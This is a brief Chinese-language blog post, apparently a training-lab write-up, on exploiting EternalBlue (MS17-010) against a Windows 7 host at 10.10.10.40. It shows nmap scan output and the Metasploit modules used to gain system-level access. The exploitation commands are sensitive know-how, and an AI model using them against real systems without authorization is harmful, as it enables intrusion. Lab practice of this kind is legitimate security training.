永恒之蓝 - whale3070's blog

10.10.10.40

135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC

OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)

139、445，很眼熟，于是用nessus扫描一下，是不是永恒之蓝等类似漏洞。

use exploit/windows/smb/ms17_010_eternalblue 失败
use exploit/windows/smb/ms17_010
sysinfo
getuid

运行后直接是最高权限。

training

training windows

ms08-067 Previous